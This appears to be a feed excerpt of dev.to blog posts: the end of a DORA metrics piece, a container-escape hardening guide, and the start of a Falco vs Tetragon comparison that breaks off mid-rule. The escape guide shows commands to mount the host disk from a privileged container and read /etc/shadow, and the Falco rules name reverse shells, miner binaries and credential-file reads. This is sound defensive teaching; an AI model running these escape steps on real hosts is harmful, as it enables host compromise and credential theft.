&lt;p&gt;The metrics above are only as good as the data feeding them. Here's where to get each metric:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Deployment Frequency:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Source: CI/CD pipeline events (GitHub Actions webhook, ArgoCD notifications, Flux alerts)&lt;/li&gt;
&lt;li&gt;Label each deployment with type: &lt;code&gt;feature&lt;/code&gt;, &lt;code&gt;bugfix&lt;/code&gt;, &lt;code&gt;config&lt;/code&gt;, &lt;code&gt;dependency&lt;/code&gt;, &lt;code&gt;infra&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Push to Prometheus via pushgateway or use a deployment tracker service&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Lead Time:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Source: Git events (first commit timestamp) + deployment events (production rollout timestamp)&lt;/li&gt;
&lt;li&gt;Calculate: &lt;code&gt;production_deploy_time - first_commit_time&lt;/code&gt; for each PR/branch&lt;/li&gt;
&lt;li&gt;Tools: LinearB, Sleuth, or custom webhook that tracks PR lifecycle&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Change Failure Rate:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Source: Incident tracking (PagerDuty, Opsgenie) correlated with deployment events&lt;/li&gt;
&lt;li&gt;Logic: if incident starts within 1 hour of deployment AND affects the deployed service, count as change failure&lt;/li&gt;
&lt;li&gt;This correlation is the hardest part — most teams get it wrong because they don't link incidents to deploys&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;MTTR:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Source: Monitoring (Prometheus alertmanager) for impact start, incident tracker for resolution&lt;/li&gt;
&lt;li&gt;Measure from first error rate spike (detected by anomaly detection), not from alert firing&lt;/li&gt;
&lt;li&gt;Include: detection lag, triage time, fix time, verification time as separate sub-metrics&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  SPACE Framework: Beyond DORA
&lt;/h2&gt;

&lt;p&gt;DORA measures delivery performance. SPACE (from Microsoft Research) adds developer experience:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;S&lt;/strong&gt;atisfaction and well-being (quarterly survey, eNPS score)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;P&lt;/strong&gt;erformance (DORA metrics as described above)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;A&lt;/strong&gt;ctivity (commits, PRs, reviews — use carefully, never as productivity proxy)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;C&lt;/strong&gt;ommunication and collaboration (PR review turnaround, async response time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;E&lt;/strong&gt;fficiency and flow (focus time from calendar analysis, context switches from tool telemetry)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The combination of DORA (system performance) + SPACE (human experience) gives you the full picture. A team with elite DORA metrics but 30% satisfaction is one resignation away from collapse.&lt;/p&gt;

&lt;h2&gt;
  
  
  Our Recommendation
&lt;/h2&gt;

&lt;p&gt;Start with just two metrics: deployment frequency (filtered by type) and change failure rate. These are the easiest to instrument and the most actionable. Add lead time once you have the data pipeline working. Add MTTR when you have incident tracking mature enough to correlate with deploys.&lt;/p&gt;

&lt;p&gt;The dashboard is not the goal. The goal is a team that ships faster with fewer failures. The dashboard just makes the trend visible so you can have evidence-based conversations about where to invest in your platform.&lt;/p&gt;




&lt;p&gt;Want help building a DORA metrics dashboard that actually drives improvement? &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Book a free platform engineering consultation&lt;/a&gt; or explore our &lt;a href="https://techsaas.cloud/services" rel="noopener noreferrer"&gt;DevOps services&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>devops</category>
      <category>platformengineering</category>
      <category>metrics</category>
      <category>observability</category>
    </item>
    <item>
      <title>Container Escape Vulnerabilities in 2026: runc, cgroups, and Kernel Capabilities</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Wed, 06 May 2026 13:22:28 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/container-escape-vulnerabilities-in-2026-runc-cgroups-and-kernel-capabilities-3coi</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/container-escape-vulnerabilities-in-2026-runc-cgroups-and-kernel-capabilities-3coi</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/container-escape-vulnerabilities-runc-cgroups-2026" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;







&lt;p&gt;title: "Container Escape Vulnerabilities in 2026: runc, cgroups, and Kernel Capabilities"&lt;br&gt;
slug: container-escape-vulnerabilities-runc-cgroups-2026&lt;br&gt;
category: Security&lt;br&gt;
tags: [Container Security, Docker, Kubernetes, Runtime Security, DevSecOps]&lt;br&gt;
seo_title: "Container Escape Vulnerabilities 2026: runc, cgroups, Kernel Exploits"&lt;br&gt;
meta_description: "Three container escape vectors that work in 2026: runc CVEs, cgroup misconfigurations, and Linux capability leaks. Detection methods and hardening guide."&lt;/p&gt;
&lt;h2&gt;
  
  
  estimated_read_time: 11
&lt;/h2&gt;
&lt;h1&gt;
  
  
  Container Escape Vulnerabilities in 2026: What Still Works and How to Defend
&lt;/h1&gt;

&lt;p&gt;Containers are not VMs. The isolation boundary is thinner than most engineers realize — a shared kernel, a set of namespaces, and some cgroup limits. When any of these layers has a bug or misconfiguration, an attacker inside a container can reach the host.&lt;/p&gt;

&lt;p&gt;Here are three escape vectors that remain viable in 2026, and how to defend against each.&lt;/p&gt;
&lt;h2&gt;
  
  
  Vector 1: runc CVEs — The Runtime Layer
&lt;/h2&gt;

&lt;p&gt;runc is the OCI container runtime that Docker and Kubernetes use under the hood. When runc has a vulnerability, every container on the host is at risk.&lt;/p&gt;
&lt;h3&gt;
  
  
  CVE History That Matters
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CVE-2024-21626&lt;/strong&gt; (Leaky File Descriptors): runc leaked file descriptors into containers, allowing an attacker to access the host filesystem through &lt;code&gt;/proc/self/fd/&lt;/code&gt;. Any container image could exploit this on first run.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CVE-2019-5736&lt;/strong&gt; (runc overwrite): A malicious container could overwrite the host runc binary, gaining code execution on the host when any container next starts.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These aren't theoretical. CVE-2024-21626 was exploitable with a single &lt;code&gt;WORKDIR&lt;/code&gt; instruction in a Dockerfile.&lt;/p&gt;
&lt;h3&gt;
  
  
  Defense
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check your runc version&lt;/span&gt;
runc &lt;span class="nt"&gt;--version&lt;/span&gt;
&lt;span class="c"&gt;# Must be &amp;gt;= 1.1.14 (patches CVE-2024-21626)&lt;/span&gt;

&lt;span class="c"&gt;# Use a hardened runtime instead&lt;/span&gt;
&lt;span class="c"&gt;# gVisor (application kernel — no shared kernel)&lt;/span&gt;
&lt;span class="c"&gt;# Kata Containers (lightweight VM — true isolation)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;For high-security workloads, replace runc entirely:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Kubernetes RuntimeClass for gVisor&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;node.k8s.io/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;RuntimeClass&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gvisor&lt;/span&gt;
&lt;span class="na"&gt;handler&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;runsc&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;runtimeClassName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gvisor&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;untrusted-workload&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;myapp:latest&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Vector 2: cgroup Misconfiguration — The Resource Layer
&lt;/h2&gt;

&lt;p&gt;cgroups limit what resources a container can use. But they also control access to devices, and misconfigurations can expose the host.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Device Access Escape
&lt;/h3&gt;

&lt;p&gt;If a container has access to the host's block devices (e.g., &lt;code&gt;/dev/sda&lt;/code&gt;), it can mount the host filesystem directly:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside a misconfigured container with device access&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; /tmp/host
mount /dev/sda1 /tmp/host
&lt;span class="c"&gt;# Now you have full read/write access to the host filesystem&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; /tmp/host/etc/shadow
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This happens when containers run with &lt;code&gt;--privileged&lt;/code&gt; or when device cgroup rules are too permissive.&lt;/p&gt;

&lt;h3&gt;
  
  
  The cgroup Escape (CVE-2022-0492)
&lt;/h3&gt;

&lt;p&gt;A bug in cgroup v1's release_agent mechanism allowed a container process to write to the host's cgroup filesystem and execute arbitrary commands on the host.&lt;/p&gt;

&lt;h3&gt;
  
  
  Defense
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Kubernetes PodSecurityStandard — enforce "restricted" profile&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Namespace&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;pod-security.kubernetes.io/enforce&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;restricted&lt;/span&gt;
    &lt;span class="na"&gt;pod-security.kubernetes.io/warn&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;restricted&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Specific hardening:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Never run privileged containers&lt;/strong&gt; in production. If a vendor requires &lt;code&gt;--privileged&lt;/code&gt;, that's a red flag.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use cgroup v2&lt;/strong&gt; — it has a fundamentally more secure design than v1.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Drop all capabilities and add back only what's needed:&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;capabilities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;drop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ALL"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;add&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;NET_BIND_SERVICE"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;  &lt;span class="c1"&gt;# Only if needed&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Vector 3: Linux Capability Leaks — The Kernel Layer
&lt;/h2&gt;

&lt;p&gt;Linux capabilities split root privileges into smaller chunks. But some capabilities are dangerous enough to enable container escapes on their own.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Dangerous Capabilities
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Capability&lt;/th&gt;
&lt;th&gt;Why It's Dangerous&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Mount filesystems, change namespaces — nearly equivalent to root&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CAP_SYS_PTRACE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Trace any process — can inject code into host processes via /proc&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CAP_NET_RAW&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Raw sockets — enables ARP spoofing, traffic interception&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CAP_DAC_OVERRIDE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Bypass file permission checks — read any file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CAP_SYS_MODULE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Load kernel modules — direct kernel code execution&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Docker's default capability set includes &lt;code&gt;CAP_NET_RAW&lt;/code&gt; and several others that most applications don't need.&lt;/p&gt;

&lt;h3&gt;
  
  
  Defense: Minimal Capability Set
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="c"&gt;# In your Dockerfile — run as non-root&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;adduser &lt;span class="nt"&gt;--disabled-password&lt;/span&gt; &lt;span class="nt"&gt;--gecos&lt;/span&gt; &lt;span class="s1"&gt;''&lt;/span&gt; appuser
&lt;span class="k"&gt;USER&lt;/span&gt;&lt;span class="s"&gt; appuser&lt;/span&gt;

&lt;span class="c"&gt;# In Kubernetes — drop all, add none&lt;/span&gt;
securityContext:
  runAsNonRoot: true
  runAsUser: 1000
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  capabilities:
    drop: ["ALL"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Detection: Runtime Monitoring
&lt;/h3&gt;

&lt;p&gt;Use Falco or Tetragon to detect escape attempts in real-time:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Falco rule — detect mount from container&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Container Mounted Host Path&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Detect container attempting to mount host filesystem&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;evt.type = mount and container.id != host&lt;/span&gt;
    &lt;span class="s"&gt;and not mount.source startswith "/var/lib/docker"&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Container&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;escape&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;attempt&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;via&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;mount&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;(container=%container.name)"&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CRITICAL&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  The Defense-in-Depth Stack
&lt;/h2&gt;

&lt;p&gt;No single defense is sufficient. Layer them:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Build time:&lt;/strong&gt; Scan images with Trivy/Grype, reject images running as root&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Admission:&lt;/strong&gt; Kubernetes PodSecurityStandards set to "restricted"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime:&lt;/strong&gt; Drop ALL capabilities, use read-only root filesystem&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Detection:&lt;/strong&gt; Falco or Tetragon monitoring for suspicious syscalls&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Isolation:&lt;/strong&gt; gVisor or Kata Containers for untrusted workloads&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Patching:&lt;/strong&gt; Automated runc/containerd updates within 48 hours of CVE disclosure&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Quick Audit
&lt;/h2&gt;

&lt;p&gt;Run this against your cluster to find the most obvious issues:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Find privileged containers&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; json | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'
  .items[] | select(.spec.containers[].securityContext.privileged == true)
  | "\(.metadata.namespace)/\(.metadata.name)"'&lt;/span&gt;

&lt;span class="c"&gt;# Find containers running as root&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; json | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'
  .items[] | select(.spec.containers[].securityContext.runAsNonRoot != true)
  | "\(.metadata.namespace)/\(.metadata.name)"'&lt;/span&gt;

&lt;span class="c"&gt;# Find containers with dangerous capabilities&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; json | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'
  .items[] | select(.spec.containers[].securityContext.capabilities.add
  | . != null and (. | inside(["SYS_ADMIN","SYS_PTRACE","NET_RAW"])))
  | "\(.metadata.namespace)/\(.metadata.name)"'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;Need a container security audit? We perform comprehensive runtime security assessments and help teams harden their Kubernetes deployments. &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Book a security consultation&lt;/a&gt; or explore our &lt;a href="https://techsaas.cloud/services" rel="noopener noreferrer"&gt;DevSecOps services&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>devops</category>
      <category>security</category>
      <category>containers</category>
      <category>kubernetes</category>
    </item>
    <item>
      <title>Falco vs Tetragon: Detection vs Enforcement for Container Runtime Security</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Wed, 06 May 2026 06:00:05 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/falco-vs-tetragon-detection-vs-enforcement-for-container-runtime-security-10kl</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/falco-vs-tetragon-detection-vs-enforcement-for-container-runtime-security-10kl</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/runtime-security-cilium-tetragon" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/runtime-security-cilium-tetragon?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=runtime-security-cilium-tetragon" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  Falco vs Tetragon: Detection vs Enforcement for Container Runtime Security
&lt;/h1&gt;

&lt;p&gt;Here's an uncomfortable truth about container security: most teams deploy Falco, get a firehose of alerts, ignore 90% of them, and call it "runtime security." Meanwhile, the actual attack -- a reverse shell spawned from a compromised Node.js dependency -- fires an alert that sits in a Slack channel for 47 minutes before anyone notices.&lt;/p&gt;

&lt;p&gt;Detection without enforcement is just expensive logging.&lt;/p&gt;

&lt;p&gt;Cilium Tetragon changes the equation. Instead of alerting you that something bad happened, it kills the process before the bad thing completes. That's a fundamentally different security model, and after deploying both tools across dozens of production clusters, I have strong opinions about when each one belongs in your stack.&lt;/p&gt;

&lt;h2&gt;
  
  
  How They Actually Work
&lt;/h2&gt;

&lt;p&gt;Both tools use eBPF, but in very different ways.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Falco&lt;/strong&gt; hooks into system calls via eBPF (or a kernel module on older kernels) and evaluates them against a rules engine. When a rule matches, it generates an alert. The process continues executing. Falco is a &lt;strong&gt;detection&lt;/strong&gt; tool -- it tells you something happened.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tetragon&lt;/strong&gt; hooks deeper. It attaches eBPF programs to kernel functions (kprobes, tracepoints, LSM hooks) and can take &lt;strong&gt;enforcement actions&lt;/strong&gt; inline -- before the syscall returns to userspace. It can send SIGKILL to a process, override a syscall return value, or throttle file access. The process doesn't get to finish what it started.&lt;/p&gt;

&lt;p&gt;The architectural difference:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Falco:    syscall → eBPF probe → userspace engine → alert → (human decides) → response
Tetragon: syscall → eBPF probe → in-kernel policy → SIGKILL (3μs) → alert
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That "human decides" gap in the Falco pipeline? That's where breaches happen.&lt;/p&gt;

&lt;h2&gt;
  
  
  Setting Up Falco for Real Detection
&lt;/h2&gt;

&lt;p&gt;Let's be practical. Here's a Falco deployment that actually catches things, not the default config that alerts on everything:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# falco-custom-rules.yaml&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Reverse Shell Detected&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Detect reverse shell connections from containers&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;spawned_process and&lt;/span&gt;
    &lt;span class="s"&gt;container and&lt;/span&gt;
    &lt;span class="s"&gt;((proc.name in (bash, sh, dash, zsh)) and&lt;/span&gt;
     &lt;span class="s"&gt;(fd.type = ipv4 or fd.type = ipv6) and&lt;/span&gt;
     &lt;span class="s"&gt;fd.direction = out)&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;Reverse shell detected (container=%container.name&lt;/span&gt;
    &lt;span class="s"&gt;command=%proc.cmdline connection=%fd.name&lt;/span&gt;
    &lt;span class="s"&gt;user=%user.name image=%container.image.repository)&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CRITICAL&lt;/span&gt;
  &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;network&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;process&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;attack&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Crypto Miner Binary&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Known crypto mining process names&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;spawned_process and container and&lt;/span&gt;
    &lt;span class="s"&gt;proc.name in (xmrig, minerd, minergate, cpuminer, &lt;/span&gt;
                  &lt;span class="s"&gt;kdevtmpfsi, kinsing)&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;Crypto miner detected (container=%container.name &lt;/span&gt;
    &lt;span class="s"&gt;process=%proc.name image=%container.image.repository)&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CRITICAL&lt;/span&gt;
  &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;process&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;crypto&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;attack&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Sensitive File Read in Container&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Reading sensitive files that containers shouldn't touch&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;open_read and container and&lt;/span&gt;
    &lt;span class="s"&gt;(fd.name startswith /etc/shadow or&lt;/span&gt;
